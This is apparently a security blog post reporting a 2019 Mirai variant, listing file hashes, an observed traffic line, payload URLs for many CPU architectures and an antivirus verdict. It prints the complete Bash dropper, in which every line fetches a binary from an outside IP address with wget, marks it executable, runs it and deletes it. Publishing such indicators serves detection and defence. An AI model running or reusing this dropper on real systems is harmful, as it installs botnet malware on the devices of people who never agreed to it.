Wednesday, August 7, 2019

New Mirai Variant (KOR, RU) - Different Architectures incl MIPS & ARMv7



Generic.Bash.MiraiA.72271860

-------------------------------

File Identification

MD5: 43f9fc4fbc043cceda8aab0b596010be
Sha1: b8ff8c4b7a85be8d67eb21016bda1690a2effc42
Sha256: 86655593af5eaf3f4055c61a4e86c5b8ac02d330726fbd52dfa2073abc60
----------------
Virbr0

HTTP traffic on port 443 (POST)    192.168.122.21    178.255.209.22    Policy Violation    HTTPon443
----------------

IP    185.70.105.178

URL    http://185.70.105.178/armv5l
URL    http://185.70.105.178/mipsel
URL    http://185.70.105.178/powerpc
URL    http://185.70.105.178/sparc
URL    http://185.70.105.178/i586
URL    http://185.70.105.178/m68k
URL    http://185.70.105.178/i686
URL    http://185.70.105.178/sh4
URL    http://185.70.105.178/mips
URL    http://185.70.105.178/armv6l
URL    http://185.70.105.178/armv7l
URL    http://185.70.105.178/armv4l
URL    http://185.70.105.178/x86

----------------

 File Type: Bourne-Again shell script, ASCII text executable

Analysis Date: Jul. 30, 2019, 9:56 AM
Size: 1.818 KB (1818 bytes)
File Classification: SH

AVAST    BV:Downloader-AAN\ [Drp]    Malware infection

----------------
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/i586; chmod +x i586; ./i586; rm -rf i586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/i686; chmod +x i686; ./i686; rm -rf i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/m68k; chmod +x m68k; ./m68k; rm -rf m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/mips; chmod +x mips; ./mips; rm -rf mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/powerpc-440fp; chmod +x powerpc-440fp; ./powerpc-440fp; rm -rf powerpc-440fp
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/sh4; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/sparc; chmod +x sparc; ./sparc; rm -rf sparc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/x86; chmod +x x86; ./x86; rm -rf x86
----------------

Generic.Bash.MiraiA.72271860

at

No comments:

Post a Comment

Thank you for your comment. Will try to react as soon as possible.

Regards,

Networ King

Subscribe to: Post Comments (Atom)